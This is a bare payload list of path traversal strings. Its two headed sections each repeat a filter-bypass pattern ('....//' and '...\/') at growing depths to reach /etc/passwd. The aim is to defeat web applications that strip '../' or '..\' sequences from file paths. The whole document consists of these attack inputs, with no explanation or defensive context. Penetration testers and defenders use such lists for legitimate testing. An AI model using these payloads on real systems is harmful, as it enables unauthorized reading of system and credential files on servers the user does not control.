

Bypass -> ../ Strip 
....//etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//etc/passwd

----------------------



-----------------------

Bypass -> ..\ Strip 

...\/etc/passwd
...\/...\/etc/passwd
...\/...\/...\/etc/passwd
...\/...\/...\/...\/etc/passwd
...\/...\/...\/...\/...\/etc/passwd
...\/...\/...\/...\/...\/...\/etc/passwd
...\/...\/...\/...\/...\/...\/...\/etc/passwd